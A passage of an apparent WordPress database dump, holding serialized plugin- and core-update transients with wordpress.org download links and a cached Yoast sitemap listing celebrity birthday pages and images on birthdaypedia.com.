e-thumbnails\";s:4:\"slug\";s:27:\"force-regenerate-thumbnails\";s:6:\"plugin\";s:59:\"force-regenerate-thumbnails/force-regenerate-thumbnails.php\";s:11:\"new_version\";s:5:\"2.1.1\";s:3:\"url\";s:58:\"https://wordpress.org/plugins/force-regenerate-thumbnails/\";s:7:\"package\";s:76:\"https://downloads.wordpress.org/plugin/force-regenerate-thumbnails.2.1.1.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:80:\"https://ps.w.org/force-regenerate-thumbnails/assets/icon-256x256.jpg?rev=2816275\";s:2:\"1x\";s:80:\"https://ps.w.org/force-regenerate-thumbnails/assets/icon-128x128.jpg?rev=2816275\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:83:\"https://ps.w.org/force-regenerate-thumbnails/assets/banner-1544x500.jpg?rev=2816275\";s:2:\"1x\";s:82:\"https://ps.w.org/force-regenerate-thumbnails/assets/banner-772x250.jpg?rev=2816275\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"4.9\";s:6:\"tested\";s:5:\"6.1.1\";s:12:\"requires_php\";s:3:\"7.2\";s:13:\"compatibility\";O:8:\"stdClass\":0:{}}s:27:\"js_composer/js_composer.php\";O:8:\"stdClass\":5:{s:4:\"slug\";s:11:\"js_composer\";s:11:\"new_version\";s:6:\"6.10.0\";s:3:\"url\";s:0:\"\";s:7:\"package\";b:0;s:4:\"name\";s:24:\"WPBakery Visual Composer\";}}s:12:\"translations\";a:0:{}s:9:\"no_update\";a:4:{s:19:\"akismet/akismet.php\";O:8:\"stdClass\":13:{s:2:\"id\";s:21:\"w.org/plugins/akismet\";s:4:\"slug\";s:7:\"akismet\";s:6:\"plugin\";s:19:\"akismet/akismet.php\";s:11:\"new_version\";s:5:\"5.0.2\";s:3:\"url\";s:38:\"https://wordpress.org/plugins/akismet/\";s:7:\"package\";s:56:\"https://downloads.wordpress.org/plugin/akismet.5.0.2.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:60:\"https://ps.w.org/akismet/assets/icon-256x256.png?rev=2818463\";s:2:\"1x\";s:60:\"https://ps.w.org/akismet/assets/icon-128x128.png?rev=2818463\";}s:7:\"banners\";a:1:{s:2:\"1x\";s:61:\"https://ps.w.org/akismet/assets/banner-772x250.jpg?rev=479904\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"5.0\";s:6:\"tested\";s:5:\"6.1.1\";s:12:\"requires_php\";s:3:\"5.2\";s:13:\"compatibility\";a:0:{}}s:36:\"contact-form-7/wp-contact-form-7.php\";O:8:\"stdClass\":13:{s:2:\"id\";s:28:\"w.org/plugins/contact-form-7\";s:4:\"slug\";s:14:\"contact-form-7\";s:6:\"plugin\";s:36:\"contact-form-7/wp-contact-form-7.php\";s:11:\"new_version\";s:5:\"5.7.3\";s:3:\"url\";s:45:\"https://wordpress.org/plugins/contact-form-7/\";s:7:\"package\";s:63:\"https://downloads.wordpress.org/plugin/contact-form-7.5.7.3.zip\";s:5:\"icons\";a:3:{s:2:\"2x\";s:67:\"https://ps.w.org/contact-form-7/assets/icon-256x256.png?rev=2279696\";s:2:\"1x\";s:59:\"https://ps.w.org/contact-form-7/assets/icon.svg?rev=2339255\";s:3:\"svg\";s:59:\"https://ps.w.org/contact-form-7/assets/icon.svg?rev=2339255\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:69:\"https://ps.w.org/contact-form-7/assets/banner-1544x500.png?rev=860901\";s:2:\"1x\";s:68:\"https://ps.w.org/contact-form-7/assets/banner-772x250.png?rev=880427\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"6.0\";s:6:\"tested\";s:5:\"6.1.1\";s:12:\"requires_php\";b:0;s:13:\"compatibility\";a:0:{}}s:37:\"tinymce-advanced/tinymce-advanced.php\";O:8:\"stdClass\":13:{s:2:\"id\";s:30:\"w.org/plugins/tinymce-advanced\";s:4:\"slug\";s:16:\"tinymce-advanced\";s:6:\"plugin\";s:37:\"tinymce-advanced/tinymce-advanced.php\";s:11:\"new_version\";s:5:\"5.6.0\";s:3:\"url\";s:47:\"https://wordpress.org/plugins/tinymce-advanced/\";s:7:\"package\";s:65:\"https://downloads.wordpress.org/plugin/tinymce-advanced.5.6.0.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:68:\"https://ps.w.org/tinymce-advanced/assets/icon-256x256.png?rev=971511\";s:2:\"1x\";s:68:\"https://ps.w.org/tinymce-advanced/assets/icon-128x128.png?rev=971511\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:72:\"https://ps.w.org/tinymce-advanced/assets/banner-1544x500.png?rev=2390186\";s:2:\"1x\";s:71:\"https://ps.w.org/tinymce-advanced/assets/banner-772x250.png?rev=2390186\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"5.6\";s:6:\"tested\";s:5:\"5.7.8\";s:12:\"requires_php\";s:3:\"5.6\";s:13:\"compatibility\";a:0:{}}s:24:\"wordpress-seo/wp-seo.php\";O:8:\"stdClass\":13:{s:2:\"id\";s:27:\"w.org/plugins/wordpress-seo\";s:4:\"slug\";s:13:\"wordpress-seo\";s:6:\"plugin\";s:24:\"wordpress-seo/wp-seo.php\";s:11:\"new_version\";s:4:\"20.0\";s:3:\"url\";s:44:\"https://wordpress.org/plugins/wordpress-seo/\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/plugin/wordpress-seo.20.0.zip\";s:5:\"icons\";a:3:{s:2:\"2x\";s:66:\"https://ps.w.org/wordpress-seo/assets/icon-256x256.png?rev=2643727\";s:2:\"1x\";s:58:\"https://ps.w.org/wordpress-seo/assets/icon.svg?rev=2363699\";s:3:\"svg\";s:58:\"https://ps.w.org/wordpress-seo/assets/icon.svg?rev=2363699\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:69:\"https://ps.w.org/wordpress-seo/assets/banner-1544x500.png?rev=2643727\";s:2:\"1x\";s:68:\"https://ps.w.org/wordpress-seo/assets/banner-772x250.png?rev=2643727\";}s:11:\"banners_rtl\";a:2:{s:2:\"2x\";s:73:\"https://ps.w.org/wordpress-seo/assets/banner-1544x500-rtl.png?rev=2643727\";s:2:\"1x\";s:72:\"https://ps.w.org/wordpress-seo/assets/banner-772x250-rtl.png?rev=2643727\";}s:8:\"requires\";s:3:\"6.0\";s:6:\"tested\";s:5:\"6.1.1\";s:12:\"requires_php\";s:6:\"5.6.20\";s:13:\"compatibility\";a:0:{}}}}','no'),(102976,'_site_transient_update_core','O:8:\"stdClass\":4:{s:7:\"updates\";a:15:{i:0;O:8:\"stdClass\":10:{s:8:\"response\";s:7:\"upgrade\";s:8:\"download\";s:59:\"https://downloads.wordpress.org/release/wordpress-6.1.1.zip\";s:6:\"locale\";s:5:\"en_US\";s:8:\"packages\";O:8:\"stdClass\":5:{s:4:\"full\";s:59:\"https://downloads.wordpress.org/release/wordpress-6.1.1.zip\";s:10:\"no_content\";s:70:\"https://downloads.wordpress.org/release/wordpress-6.1.1-no-content.zip\";s:11:\"new_bundled\";s:71:\"https://downloads.wordpress.org/release/wordpress-6.1.1-new-bundled.zip\";s:7:\"partial\";b:0;s:8:\"rollback\";b:0;}s:7:\"current\";s:5:\"6.1.1\";s:7:\"version\";s:5:\"6.1.1\";s:11:\"php_version\";s:6:\"5.6.20\";s:13:\"mysql_version\";s:3:\"5.0\";s:11:\"new_bundled\";s:3:\"6.1\";s:15:\"partial_version\";s:0:\"\";}i:1;O:8:\"stdClass\":11:{s:8:\"response\";s:10:\"autoupdate\";s:8:\"download\";s:59:\"https://downloads.wordpress.org/release/wordpress-6.1.1.zip\";s:6:\"locale\";s:5:\"en_US\";s:8:\"packages\";O:8:\"stdClass\":5:{s:4:\"full\";s:59:\"https://downloads.wordpress.org/release/wordpress-6.1.1.zip\";s:10:\"no_content\";s:70:\"https://downloads.wordpress.org/release/wordpress-6.1.1-no-content.zip\";s:11:\"new_bundled\";s:71:\"https://downloads.wordpress.org/release/wordpress-6.1.1-new-bundled.zip\";s:7:\"partial\";b:0;s:8:\"rollback\";b:0;}s:7:\"current\";s:5:\"6.1.1\";s:7:\"version\";s:5:\"6.1.1\";s:11:\"php_version\";s:6:\"5.6.20\";s:13:\"mysql_version\";s:3:\"5.0\";s:11:\"new_bundled\";s:3:\"6.1\";s:15:\"partial_version\";s:0:\"\";s:9:\"new_files\";s:1:\"1\";}i:2;O:8:\"stdClass\":11:{s:8:\"response\";s:10:\"autoupdate\";s:8:\"download\";s:57:\"https://downloads.wordpress.org/release/wordpress-6.1.zip\";s:6:\"locale\";s:5:\"en_US\";s:8:\"packages\";O:8:\"stdClass\":5:{s:4:\"full\";s:57:\"https://downloads.wordpress.org/release/wordpress-6.1.zip\";s:10:\"no_content\";s:68:\"https://downloads.wordpress.org/release/wordpress-6.1-no-content.zip\";s:11:\"new_bundled\";s:69:\"https://downloads.wordpress.org/release/wordpress-6.1-new-bundled.zip\";s:7:\"partial\";b:0;s:8:\"rollback\";b:0;}s:7:\"current\";s:3:\"6.1\";s:7:\"version\";s:3:\"6.1\";s:11:\"php_version\";s:6:\"5.6.20\";s:13:\"mysql_version\";s:3:\"5.0\";s:11:\"new_bundled\";s:3:\"6.1\";s:15:\"partial_version\";s:0:\"\";s:9:\"new_files\";s:1:\"1\";}i:3;O:8:\"stdClass\":11:{s:8:\"response\";s:10:\"autoupdate\";s:8:\"download\";s:59:\"https://downloads.wordpress.org/release/wordpress-6.0.3.zip\";s:6:\"locale\";s:5:\"en_US\";s:8:\"packages\";O:8:\"stdClass\":5:{s:4:\"full\";s:59:\"https://downloads.wordpress.org/release/wordpress-6.0.3.zip\";s:10:\"no_content\";s:70:\"https://downloads.wordpress.org/release/wordpress-6.0.3-no-content.zip\";s:11:\"new_bundled\";s:71:\"https://downloads.wordpress.org/release/wordpress-6.0.3-new-bundled.zip\";s:7:\"partial\";b:0;s:8:\"rollback\";b:0;}s:7:\"current\";s:5:\"6.0.3\";s:7:\"version\";s:5:\"6.0.3\";s:11:\"php_version\";s:6:\"5.6.20\";s:13:\"mysql_version\";s:3:\"5.0\";s:11:\"new_bundled\";s:3:\"6.1\";s:15:\"partial_version\";s:0:\"\";s:9:\"new_files\";s:1:\"1\";}i:4;O:8:\"stdClass\":11:{s:8:\"response\";s:10:\"autoupdate\";s:8:\"download\";s:59:\"https://downloads.wordpress.org/release/wordpress-5.9.5.zip\";s:6:\"locale\";s:5:\"en_US\";s:8:\"packages\";O:8:\"stdClass\":5:{s:4:\"full\";s:59:\"https://downloads.wordpress.org/release/wordpress-5.9.5.zip\";s:10:\"no_content\";s:70:\"https://downloads.wordpress.org/release/wordpress-5.9.5-no-content.zip\";s:11:\"new_bundled\";s:71:\"https://downloads.wordpress.org/release/wordpress-5.9.5-new-bundled.zip\";s:7:\"partial\";b:0;s:8:\"rollback\";b:0;}s:7:\"current\";s:5:\"5.9.5\";s:7:\"version\";s:5:\"5.9.5\";s:11:\"php_version\";s:6:\"5.6.20\";s:13:\"mysql_version\";s:3:\"5.0\";s:11:\"new_bundled\";s:3:\"6.1\";s:15:\"partial_version\";s:0:\"\";s:9:\"new_files\";s:1:\"1\";}i:5;O:8:\"stdClass\":11:{s:8:\"response\";s:10:\"autoupdate\";s:8:\"download\";s:59:\"https://downloads.wordpress.org/release/wordpress-5.8.6.zip\";s:6:\"locale\";s:5:\"en_US\";s:8:\"packages\";O:8:\"stdClass\":5:{s:4:\"full\";s:59:\"https://downloads.wordpress.org/release/wordpress-5.8.6.zip\";s:10:\"no_content\";s:70:\"https://downloads.wordpress.org/release/wordpress-5.8.6-no-content.zip\";s:11:\"new_bundled\";s:71:\"https://downloads.wordpress.org/release/wordpress-5.8.6-new-bundled.zip\";s:7:\"partial\";b:0;s:8:\"rollback\";b:0;}s:7:\"current\";s:5:\"5.8.6\";s:7:\"version\";s:5:\"5.8.6\";s:11:\"php_version\";s:6:\"5.6.20\";s:13:\"mysql_version\";s:3:\"5.0\";s:11:\"new_bundled\";s:3:\"6.1\";s:15:\"partial_version\";s:0:\"\";s:9:\"new_files\";s:1:\"1\";}i:6;O:8:\"stdClass\":11:{s:8:\"response\";s:10:\"autoupdate\";s:8:\"download\";s:59:\"https://downloads.wordpress.org/release/wordpress-5.7.8.zip\";s:6:\"locale\";s:5:\"en_US\";s:8:\"packages\";O:8:\"stdClass\":5:{s:4:\"full\";s:59:\"https://downloads.wordpress.org/release/wordpress-5.7.8.zip\";s:10:\"no_content\";s:70:\"https://downloads.wordpress.org/release/wordpress-5.7.8-no-content.zip\";s:11:\"new_bundled\";s:71:\"https://downloads.wordpress.org/release/wordpress-5.7.8-new-bundled.zip\";s:7:\"partial\";b:0;s:8:\"rollback\";b:0;}s:7:\"current\";s:5:\"5.7.8\";s:7:\"version\";s:5:\"5.7.8\";s:11:\"php_version\";s:6:\"5.6.20\";s:13:\"mysql_version\";s:3:\"5.0\";s:11:\"new_bundled\";s:3:\"6.1\";s:15:\"partial_version\";s:0:\"\";s:9:\"new_files\";s:1:\"1\";}i:7;O:8:\"stdClass\":11:{s:8:\"response\";s:10:\"autoupdate\";s:8:\"download\";s:60:\"https://downloads.wordpress.org/release/wordpress-5.6.10.zip\";s:6:\"locale\";s:5:\"en_US\";s:8:\"packages\";O:8:\"stdClass\":5:{s:4:\"full\";s:60:\"https://downloads.wordpress.org/release/wordpress-5.6.10.zip\";s:10:\"no_content\";s:71:\"https://downloads.wordpress.org/release/wordpress-5.6.10-no-content.zip\";s:11:\"new_bundled\";s:72:\"https://downloads.wordpress.org/release/wordpress-5.6.10-new-bundled.zip\";s:7:\"partial\";b:0;s:8:\"rollback\";b:0;}s:7:\"current\";s:6:\"5.6.10\";s:7:\"version\";s:6:\"5.6.10\";s:11:\"php_version\";s:6:\"5.6.20\";s:13:\"mysql_version\";s:3:\"5.0\";s:11:\"new_bundled\";s:3:\"6.1\";s:15:\"partial_version\";s:0:\"\";s:9:\"new_files\";s:1:\"1\";}i:8;O:8:\"stdClass\":11:{s:8:\"response\";s:10:\"autoupdate\";s:8:\"download\";s:60:\"https://downloads.wordpress.org/release/wordpress-5.5.11.zip\";s:6:\"locale\";s:5:\"en_US\";s:8:\"packages\";O:8:\"stdClass\":5:{s:4:\"full\";s:60:\"https://downloads.wordpress.org/release/wordpress-5.5.11.zip\";s:10:\"no_content\";s:71:\"https://downloads.wordpress.org/release/wordpress-5.5.11-no-content.zip\";s:11:\"new_bundled\";s:72:\"https://downloads.wordpress.org/release/wordpress-5.5.11-new-bundled.zip\";s:7:\"partial\";b:0;s:8:\"rollback\";b:0;}s:7:\"current\";s:6:\"5.5.11\";s:7:\"version\";s:6:\"5.5.11\";s:11:\"php_version\";s:6:\"5.6.20\";s:13:\"mysql_version\";s:3:\"5.0\";s:11:\"new_bundled\";s:3:\"6.1\";s:15:\"partial_version\";s:0:\"\";s:9:\"new_files\";s:1:\"1\";}i:9;O:8:\"stdClass\":11:{s:8:\"response\";s:10:\"autoupdate\";s:8:\"download\";s:60:\"https://downloads.wordpress.org/release/wordpress-5.4.12.zip\";s:6:\"locale\";s:5:\"en_US\";s:8:\"packages\";O:8:\"stdClass\":5:{s:4:\"full\";s:60:\"https://downloads.wordpress.org/release/wordpress-5.4.12.zip\";s:10:\"no_content\";s:71:\"https://downloads.wordpress.org/release/wordpress-5.4.12-no-content.zip\";s:11:\"new_bundled\";s:72:\"https://downloads.wordpress.org/release/wordpress-5.4.12-new-bundled.zip\";s:7:\"partial\";b:0;s:8:\"rollback\";b:0;}s:7:\"current\";s:6:\"5.4.12\";s:7:\"version\";s:6:\"5.4.12\";s:11:\"php_version\";s:6:\"5.6.20\";s:13:\"mysql_version\";s:3:\"5.0\";s:11:\"new_bundled\";s:3:\"6.1\";s:15:\"partial_version\";s:0:\"\";s:9:\"new_files\";s:1:\"1\";}i:10;O:8:\"stdClass\":11:{s:8:\"response\";s:10:\"autoupdate\";s:8:\"download\";s:60:\"https://downloads.wordpress.org/release/wordpress-5.3.14.zip\";s:6:\"locale\";s:5:\"en_US\";s:8:\"packages\";O:8:\"stdClass\":5:{s:4:\"full\";s:60:\"https://downloads.wordpress.org/release/wordpress-5.3.14.zip\";s:10:\"no_content\";s:71:\"https://downloads.wordpress.org/release/wordpress-5.3.14-no-content.zip\";s:11:\"new_bundled\";s:72:\"https://downloads.wordpress.org/release/wordpress-5.3.14-new-bundled.zip\";s:7:\"partial\";b:0;s:8:\"rollback\";b:0;}s:7:\"current\";s:6:\"5.3.14\";s:7:\"version\";s:6:\"5.3.14\";s:11:\"php_version\";s:6:\"5.6.20\";s:13:\"mysql_version\";s:3:\"5.0\";s:11:\"new_bundled\";s:3:\"6.1\";s:15:\"partial_version\";s:0:\"\";s:9:\"new_files\";s:1:\"1\";}i:11;O:8:\"stdClass\":11:{s:8:\"response\";s:10:\"autoupdate\";s:8:\"download\";s:60:\"https://downloads.wordpress.org/release/wordpress-5.2.17.zip\";s:6:\"locale\";s:5:\"en_US\";s:8:\"packages\";O:8:\"stdClass\":5:{s:4:\"full\";s:60:\"https://downloads.wordpress.org/release/wordpress-5.2.17.zip\";s:10:\"no_content\";s:71:\"https://downloads.wordpress.org/release/wordpress-5.2.17-no-content.zip\";s:11:\"new_bundled\";s:72:\"https://downloads.wordpress.org/release/wordpress-5.2.17-new-bundled.zip\";s:7:\"partial\";b:0;s:8:\"rollback\";b:0;}s:7:\"current\";s:6:\"5.2.17\";s:7:\"version\";s:6:\"5.2.17\";s:11:\"php_version\";s:6:\"5.6.20\";s:13:\"mysql_version\";s:3:\"5.0\";s:11:\"new_bundled\";s:3:\"6.1\";s:15:\"partial_version\";s:0:\"\";s:9:\"new_files\";s:1:\"1\";}i:12;O:8:\"stdClass\":11:{s:8:\"response\";s:10:\"autoupdate\";s:8:\"download\";s:60:\"https://downloads.wordpress.org/release/wordpress-5.1.15.zip\";s:6:\"locale\";s:5:\"en_US\";s:8:\"packages\";O:8:\"stdClass\":5:{s:4:\"full\";s:60:\"https://downloads.wordpress.org/release/wordpress-5.1.15.zip\";s:10:\"no_content\";s:71:\"https://downloads.wordpress.org/release/wordpress-5.1.15-no-content.zip\";s:11:\"new_bundled\";s:72:\"https://downloads.wordpress.org/release/wordpress-5.1.15-new-bundled.zip\";s:7:\"partial\";b:0;s:8:\"rollback\";b:0;}s:7:\"current\";s:6:\"5.1.15\";s:7:\"version\";s:6:\"5.1.15\";s:11:\"php_version\";s:5:\"5.2.4\";s:13:\"mysql_version\";s:3:\"5.0\";s:11:\"new_bundled\";s:3:\"6.1\";s:15:\"partial_version\";s:0:\"\";s:9:\"new_files\";s:1:\"1\";}i:13;O:8:\"stdClass\":11:{s:8:\"response\";s:10:\"autoupdate\";s:8:\"download\";s:60:\"https://downloads.wordpress.org/release/wordpress-5.0.18.zip\";s:6:\"locale\";s:5:\"en_US\";s:8:\"packages\";O:8:\"stdClass\":5:{s:4:\"full\";s:60:\"https://downloads.wordpress.org/release/wordpress-5.0.18.zip\";s:10:\"no_content\";s:71:\"https://downloads.wordpress.org/release/wordpress-5.0.18-no-content.zip\";s:11:\"new_bundled\";s:72:\"https://downloads.wordpress.org/release/wordpress-5.0.18-new-bundled.zip\";s:7:\"partial\";b:0;s:8:\"rollback\";b:0;}s:7:\"current\";s:6:\"5.0.18\";s:7:\"version\";s:6:\"5.0.18\";s:11:\"php_version\";s:5:\"5.2.4\";s:13:\"mysql_version\";s:3:\"5.0\";s:11:\"new_bundled\";s:3:\"6.1\";s:15:\"partial_version\";s:0:\"\";s:9:\"new_files\";s:1:\"1\";}i:14;O:8:\"stdClass\":11:{s:8:\"response\";s:10:\"autoupdate\";s:8:\"download\";s:60:\"https://downloads.wordpress.org/release/wordpress-4.9.22.zip\";s:6:\"locale\";s:5:\"en_US\";s:8:\"packages\";O:8:\"stdClass\":5:{s:4:\"full\";s:60:\"https://downloads.wordpress.org/release/wordpress-4.9.22.zip\";s:10:\"no_content\";s:71:\"https://downloads.wordpress.org/release/wordpress-4.9.22-no-content.zip\";s:11:\"new_bundled\";s:72:\"https://downloads.wordpress.org/release/wordpress-4.9.22-new-bundled.zip\";s:7:\"partial\";s:71:\"https://downloads.wordpress.org/release/wordpress-4.9.22-partial-18.zip\";s:8:\"rollback\";s:72:\"https://downloads.wordpress.org/release/wordpress-4.9.22-rollback-18.zip\";}s:7:\"current\";s:6:\"4.9.22\";s:7:\"version\";s:6:\"4.9.22\";s:11:\"php_version\";s:5:\"5.2.4\";s:13:\"mysql_version\";s:3:\"5.0\";s:11:\"new_bundled\";s:3:\"6.1\";s:15:\"partial_version\";s:6:\"4.9.18\";s:9:\"new_files\";s:0:\"\";}}s:12:\"last_checked\";i:1674812618;s:15:\"version_checked\";s:6:\"4.9.18\";s:12:\"translations\";a:0:{}}','no'),(107658,'_transient_timeout_yst_sm_post_1:4Wt5G_2e3s8','1629411753','no'),(107659,'_transient_yst_sm_post_1:4Wt5G_2e3s8','C:24:\"WPSEO_Sitemap_Cache_Data\":60713:{a:2:{s:6:\"status\";s:2:\"ok\";s:3:\"xml\";s:60664:\"<urlset xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:image=\"http://www.google.com/schemas/sitemap-image/1.1\" xsi:schemaLocation=\"http://www.sitemaps.org/schemas/sitemap/0.9 http://www.sitemaps.org/schemas/sitemap/0.9/sitemap.xsd http://www.google.com/schemas/sitemap-image/1.1 http://www.google.com/schemas/sitemap-image/1.1/sitemap-image.xsd\" xmlns=\"http://www.sitemaps.org/schemas/sitemap/0.9\">\n <url>\n <loc>https://birthdaypedia.com/jamie-oliver/</loc>\n <lastmod>2015-07-29T12:49:33+00:00</lastmod>\n <image:image>\n <image:loc>https://birthdaypedia.com/wp-content/uploads/2015/05/Jamie-Oliver.jpg</image:loc>\n <image:title><![CDATA[Jamie Oliver]]></image:title>\n <image:caption><![CDATA[Jamie Oliver]]></image:caption>\n </image:image>\n </url>\n <url>\n <loc>https://birthdaypedia.com/carole-lombard-1908-1942/</loc>\n <lastmod>2015-10-06T21:42:56+00:00</lastmod>\n <image:image>\n <image:loc>https://birthdaypedia.com/wp-content/uploads/2015/10/Carole-Lombard.jpg</image:loc>\n <image:title><![CDATA[Carole Lombard]]></image:title>\n </image:image>\n <image:image>\n <image:loc>https://birthdaypedia.com/wp-content/uploads/2015/10/Carole_Lombard.jpg</image:loc>\n <image:title><![CDATA[Carole Lombard]]></image:title>\n <image:caption><![CDATA[Carole Lombard]]></image:caption>\n </image:image>\n </url>\n <url>\n <loc>https://birthdaypedia.com/ghandi-1869-1948/</loc>\n <lastmod>2015-10-08T17:52:48+00:00</lastmod>\n <image:image>\n <image:loc>https://birthdaypedia.com/wp-content/uploads/2015/10/Ghandi.jpg</image:loc>\n <image:title><![CDATA[Ghandi]]></image:title>\n </image:image>\n <image:image>\n <image:loc>https://birthdaypedia.com/wp-content/uploads/2015/10/Mahatma-Ghandi.jpg</image:loc>\n <image:title><![CDATA[Mahatma Ghandi]]></image:title>\n <image:caption><![CDATA[Mahatma Ghandi]]></image:caption>\n </image:image>\n </url>\n <url>\n <loc>https://birthdaypedia.com/gwen-stefani-birthday/</loc>\n <lastmod>2015-10-08T18:23:58+00:00</lastmod>\n <image:image>\n <image:loc>https://birthdaypedia.com/wp-content/uploads/2015/10/gwen-stefani-birthday.jpg</image:loc>\n <image:title><![CDATA[Gwen Stefani]]></image:title>\n <image:caption><![CDATA[Gwen Stefani]]></image:caption>\n </image:image>\n <image:image>\n <image:loc>https://birthdaypedia.com/wp-content/uploads/2015/10/Gwen.jpg</image:loc>\n <image:title><![CDATA[Gwen Stefani]]></image:title>\n <image:caption><![CDATA[Gwen Stefani]]></image:caption>\n </image:image>\n </url>\n <url>\n <loc>https://birthdaypedia.com/vladimir-putin-birthday/</loc>\n <lastmod>2015-10-08T21:12:37+00:00</lastmod>\n <image:image>\n <image:loc>https://birthdaypedia.com/wp-content/uploads/2015/10/Vladmir-Putin.jpg</image:loc>\n <image:title><![CDATA[Vladimir Putin]]></image:title>\n <image:caption><![CDATA[Vladimir Putin]]></image:caption>\n </image:image>\n <image:image>\n <image:loc>https://birthdaypedia.com/wp-content/uploads/2015/10/Vladmir_Putin.jpg</image:loc>\n <image:title><![CDATA[Vladmir Putin]]></image:title>\n <image:caption><![CDATA[Vladimir Putin birthday]]></image:caption>\n </image:image>\n </url>\n <url>\n <loc>https://birthdaypedia.com/matt-damon-birthday/</loc>\n <lastmod>2015-10-08T21:18:55+00:00</lastmod>\n <image:image>\n <image:loc>https://birthdaypedia.com/wp-content/uploads/2015/10/Matt-Damon.jpg</image:loc>\n <image:title><![CDATA[Matt Damon]]></image:title>\n </image:image>\n <image:image>\n <image:loc>https://birthdaypedia.com/wp-content/uploads/2015/10/Matt_Damon.jpg</image:loc>\n <image:title><![CDATA[Matt Damon]]></image:title>\n <image:caption><![CDATA[Matt Damon]]></image:caption>\n </image:image>\n </url>\n <url>\n <loc>https://birthdaypedia.com/russell-simmons/</loc>\n <lastmod>2015-10-09T16:27:38+00:00</lastmod>\n <image:image>\n <image:loc>https://birthdaypedia.com/wp-content/uploads/2015/10/Russell-Simmons.jpg</image:loc>\n <image:title><![CDATA[Russell Simmons]]></image:title>\n </image:image>\n <image:image>\n <image:loc>https://birthdaypedia.com/wp-content/uploads/2015/10/Russell_Simmons.jpg</image:loc>\n <image:title><![CDATA[Russell Simmons]]></image:title>\n <image:caption><![CDATA[Russell Simmons]]></image:caption>\n </image:image>\n </url>\n <url>\n <loc>https://birthdaypedia.com/marion-cotillard/</loc>\n <lastmod>2015-10-09T16:31:26+00:00</lastmod>\n <image:image>\n <image:loc>https://birthdaypedia.com/wp-content/uploads/2015/09/Marion-Cotillard.jpg</image:loc>\n <image:title><![CDATA[Marion Cotillard]]></image:title>\n </image:image>\n </url>\n <url>\n <loc>https://birthdaypedia.com/hilary-duff/</loc>\n <lastmod>2015-10-09T16:32:36+00:00</lastmod>\n <image:image>\n <image:loc>https://birthdaypedia.com/wp-content/uploads/2015/09/Hilary-Duff.jpg</image:loc>\n <image:title><![CDATA[Hilary Duff]]></image:title>\n </image:image>\n </url>\n <url>\n <loc>https://birthdaypedia.com/skylar-astin/</loc>\n <lastmod>2015-10-09T16:41:12+00:00</lastmod>\n <image:image>\n <image:loc>https://birthdaypedia.com/wp-content/uploads/2015/09/Skylar-Astin.jpg</image:loc>\n <image:title><![CDATA[Skylar Astin]]></image:title>\n </image:image>\n </url>\n <url>\n <loc>https://birthdaypedia.com/andrea-bocelli/</loc>\n <lastmod>2015-10-09T16:41:39+00:00</lastmod>\n <image:image>\n <image:loc>https://birthdaypedia.com/wp-content/uploads/2015/09/Andrea-Bocelli.jpg</image:loc>\n <image:title><![CDATA[Andrea Bocelli]]></image:title>\n </image:image>\n </url>\n <url>\n <loc>https://birthdaypedia.com/jimmy-fallon/</loc>\n <lastmod>2015-10-09T16:42:40+00:00</lastmod>\n <image:image>\n <image:loc>https://birthdaypedia.com/wp-content/uploads/2015/09/Jimmy-Fallon.jpg</image:loc>\n <image:title><![CDATA[Jimmy Fallon]]></image:title>\n </image:image>\n </url>\n <url>\n <loc>https://birthdaypedia.com/james-gandolfini/</loc>\n <lastmod>2015-10-09T16:44:16+00:00</lastmod>\n <image:image>\n <image:loc>https://birthdaypedia.com/wp-content/uploads/2015/09/James-Gandolfini.jpg</image:loc>\n <image:title><![CDATA[James Gandolfini]]></image:title>\n </image:image>\n </url>\n <url>\n <loc>https://birthdaypedia.com/kyle-chandler/</loc>\n <lastmod>2015-10-09T16:44:52+00:00</lastmod>\n <image:image>\n <image:loc>https://birthdaypedia.com/wp-content/uploads/2015/09/Kyle-Chandler.jpg</image:loc>\n <image:title><![CDATA[Kyle Chandler]]></image:title>\n </image:image>\n </url>\n <url>\n <loc>https://birthdaypedia.com/marc-anthony/</loc>\n <lastmod>2015-10-09T16:45:40+00:00</lastmod>\n <image:image>\n <image:loc>https://birthdaypedia.com/wp-content/uploads/2015/09/Marc-Anthony.jpg</image:loc>\n <image:title><![CDATA[Marc Anthony]]></image:title>\n </image:image>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tommy-lee-jones/</loc>\n <lastmod>2015-10-09T16:46:01+00:00</lastmod>\n <image:image>\n <image:loc>https://birthdaypedia.com/wp-content/uploads/2015/09/Tommy-Lee-Jones.jpg</image:loc>\n <image:title><![CDATA[Tommy Lee Jones]]></image:title>\n </image:image>\n </url>\n <url>\n <loc>https://birthdaypedia.com/amy-winehouse/</loc>\n <lastmod>2015-10-09T16:47:25+00:00</lastmod>\n <image:image>\n <image:loc>https://birthdaypedia.com/wp-content/uploads/2015/09/Amy-Winehouse.jpg</image:loc>\n <image:title><![CDATA[Amy Winehouse]]></image:title>\n </image:image>\n </url>\n <url>\n <loc>https://birthdaypedia.com/ludacris/</loc>\n <lastmod>2015-10-09T16:47:50+00:00</lastmod>\n <image:image>\n <image:loc>https://birthdaypedia.com/wp-content/uploads/2015/09/Ludacris.jpg</image:loc>\n <image:title><![CDATA[Ludacris concert at Fort Meade]]></image:title>\n </image:image>\n </url>\n <url>\n <loc>https://birthdaypedia.com/ryan-phillippe/</loc>\n <lastmod>2015-10-09T16:51:12+00:00</lastmod>\n <image:image>\n <image:loc>https://birthdaypedia.com/wp-content/uploads/2015/09/Ryan-Phillippe.jpg</image:loc>\n <image:title><![CDATA[Ryan Phillippe]]></image:title>\n </image:image>\n </url>\n <url>\n <loc>https://birthdaypedia.com/adam-sandler/</loc>\n <lastmod>2015-10-09T16:52:06+00:00</lastmod>\n <image:image>\n <image:loc>https://birthdaypedia.com/wp-content/uploads/2015/09/Adam-Sandler.jpg</image:loc>\n <image:title><![CDATA[Adam Sandler]]></image:title>\n </image:image>\n </url>\n <url>\n 